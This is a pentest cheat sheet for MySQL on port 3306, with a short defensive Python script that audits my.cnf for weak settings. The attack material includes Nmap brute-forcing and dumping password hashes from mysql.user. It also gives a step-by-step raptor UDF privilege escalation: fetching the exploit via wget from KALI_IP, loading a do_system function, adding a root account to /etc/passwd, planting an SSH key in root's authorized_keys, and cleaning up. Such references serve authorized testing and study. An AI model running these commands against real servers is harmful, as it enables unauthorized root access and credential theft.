MySQL – port 3306

MySQL database quick reference.

MariaDB is a fork of MySQL and uses similar syntax.

Start MySQL service on Kali

sudo service mysql start

Stop MySQL service on Kali

sudo service mysql stop

Connection

On Kali

sudo mysql

Locally

mysql -u <username> -p <database>
mysql -u<username> -p<password> -e 'show databases;'

Remote server

mysql -u <username> -p -h $IP
mysql -u <username> -p -h $IP --port=1234

Nmap scripts

ls -la /usr/share/nmap/scripts/mysql*
nmap -p 3306 --script=mysql* $IP
WL=/usr/share/wordlists/rockyou.txt
nmap -p 3306 --script=mysql-brute $IP --script-args userdb=users.txt,passdb=$WL

Examples

Configurations / Parameters

Server variables (runtime configuration values)

Use \G instead of ; as the statement terminator to display each row vertically (easier to read for wide result sets).

show variables\G

Configuration and data file locations (Windows / XAMPP)

C:\Windows\my.ini
C:\Windows\my.cnf
C:\my.ini
C:\my.cnf
C:\xampp\mysql\my.ini
C:\xampp\mysql\my.cnf
C:\xampp\mysql\bin\my.ini
C:\xampp\mysql\bin\my.cnf
C:\xampp\mysql\data\mysql_upgrade_info
C:\xampp\mysql\data\user.frm
C:\xampp\mysql\data\mysql_error.log
C:\xampp\xampp-control.ini
#-------------------------------------------------------------------------------
# Configurations / Parameters
#-------------------------------------------------------------------------------
# Never run MySQL as root or as nobody
# mysqld refuses to run as root unless that is specified explicitly using the --user=root option

# Configuration file:
my.cnf

# Start MySQL
mysql.server start

# Stop MySQL
mysql.server stop

# Execute OS commands from within MySQL client
\! ls -l
\! nano
\! bash

# Comments 
SELECT 1+1;     # This comment continues to the end of line
SELECT 1+1;     -- This comment continues to the end of line
SELECT 1        /* in-line or multiple line comment */ + 1;

# Quoting: backticks quote identifiers (table/column names, including reserved words), single quotes quote string literals (also accepted for aliases)
` or '
 
SELECT * FROM `select` WHERE `select`.id > 100;
SELECT 1 AS `one`, 2 AS 'two';

# List all databases
show databases;

# List all tables
use dbname;
show tables;

#-------------------------------------------------------------------------------
# Write files
#-------------------------------------------------------------------------------
SELECT id,name,email FROM customers
INTO OUTFILE '/tmp/customers.csv'
FIELDS TERMINATED BY ','
ENCLOSED BY '"'
LINES TERMINATED BY '\n';

select 1 from information_schema.tables limit 1 into outfile '/tmp/test.txt';
select distinct table_schema from information_schema.tables;
select table_name from information_schema.tables where table_schema = 'schema found in previous query';
select column_name from information_schema.columns where table_name='table found in previous query';
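The configuration file notes earlier and the INTO OUTFILE writes just above both depend on a handful of mysqld settings. The following audit script is an added example, not part of the original cheat sheet: it parses the [mysqld] section of a my.cnf / my.ini and flags the weak settings (user=root, empty secure_file_priv, skip-grant-tables, local_infile, unrestricted bind-address). Both sample configs are constructed for offline testing.

```python
"""Audit the [mysqld] section of my.cnf / my.ini for settings that weaken the
file-write and privilege boundaries this sheet relies on (added example)."""
import configparser

# Constructed sample: weak settings a reviewer would flag.
WEAK_MY_CNF = """
[mysqld]
user = root
secure_file_priv =
local-infile = 1
skip-grant-tables
bind-address = 0.0.0.0
"""

# Constructed sample: the same file with each setting corrected.
HARDENED_MY_CNF = """
[mysqld]
user = mysql
secure_file_priv = /var/lib/mysql-files
local_infile = 0
bind-address = 127.0.0.1
"""

def _norm(key: str) -> str:
    # MySQL treats '-' and '_' in option names as equivalent.
    return key.strip().lower().replace("-", "_")

def parse_mysqld_section(text: str) -> dict[str, str]:
    """Return [mysqld] options as a dict; value-less flags map to ''."""
    cp = configparser.ConfigParser(allow_no_value=True, interpolation=None, strict=False)
    cp.read_string(text)
    if not cp.has_section("mysqld"):
        return {}
    return {_norm(k): (v or "").strip().strip('"') for k, v in cp.items("mysqld")}

def audit_mysqld(opts: dict[str, str]) -> list[str]:
    """Return one finding per weak setting; an empty list means nothing flagged."""
    findings = []
    if opts.get("user") == "root":
        findings.append("user=root: mysqld should run as an unprivileged account")
    if "skip_grant_tables" in opts:
        findings.append("skip-grant-tables: all privilege checks are disabled")
    if opts.get("secure_file_priv", "") == "":
        # "" lets INTO OUTFILE / LOAD_FILE reach any path the server user can; absent = build default
        findings.append("secure_file_priv empty or not set: INTO OUTFILE / LOAD_FILE unrestricted")
    if opts.get("local_infile", "0").lower() in ("1", "on", "true"):
        findings.append("local_infile enabled: clients can read local files via LOAD DATA LOCAL")
    if opts.get("bind_address", "*") in ("0.0.0.0", "::", "*"):
        findings.append("bind_address not restricted: port 3306 reachable from any interface")
    return findings
```

Point it at a real file with `audit_mysqld(parse_mysqld_section(open("/etc/mysql/my.cnf").read()))`; files that only use `!includedir` must have the included fragments audited as well.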

Users and passwords

The column name depends on the server version (authentication_string on newer servers, password on older ones), so try both:

select user, authentication_string from mysql.user;
select user, password from mysql.user;

Privilege Escalation

Raptor

https://www.exploit-db.com/exploits/1518

Requires gcc on target, unless target is Debian (in this case compile on Kali).

searchsploit -m linux/local/1518.c
### REMOVE LINES AT THE END OF EXPLOIT
python3 -m http.server 80
wget -O /tmp/raptor_udf2.c http://KALI_IP/1518.c

gcc -g -c raptor_udf2.c
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc

Change the dumpfile path for raptor_udf2.so to match the output of "select @@plugin_dir;".

mysql -u root
use mysql
create table foo(line blob);
insert into foo values(load_file('/tmp/raptor_udf2.so'));
select @@plugin_dir;
select * from foo into dumpfile '/usr/lib/raptor_udf2.so';
create function do_system returns integer soname 'raptor_udf2.so';
select * from mysql.func;
select do_system('id > /tmp/out; chown myuser.myuser /tmp/out');

Via /etc/passwd

select do_system('echo myprecious:$(openssl passwd PreciouS):0:0:root:/root:/bin/bash >> /etc/passwd');
ssh myprecious@x.x.x.x
[PreciouS]

Via authorized_keys

Generating the key pair in the user's home directory on the victim also works.

# Generate a public/private key pair
ssh-keygen -t rsa
[leave all default parameters]
chmod 400 id_rsa
select do_system('echo "ssh-rsa ..." >> /root/.ssh/authorized_keys');
ssh -i id_rsa root@x.x.x.x

Cleanup tasks

mysql -u root
use mysql
drop function do_system;
select * from mysql.func;
quit
find / -name raptor_udf2.so
rm /<path to file>/raptor_udf2.so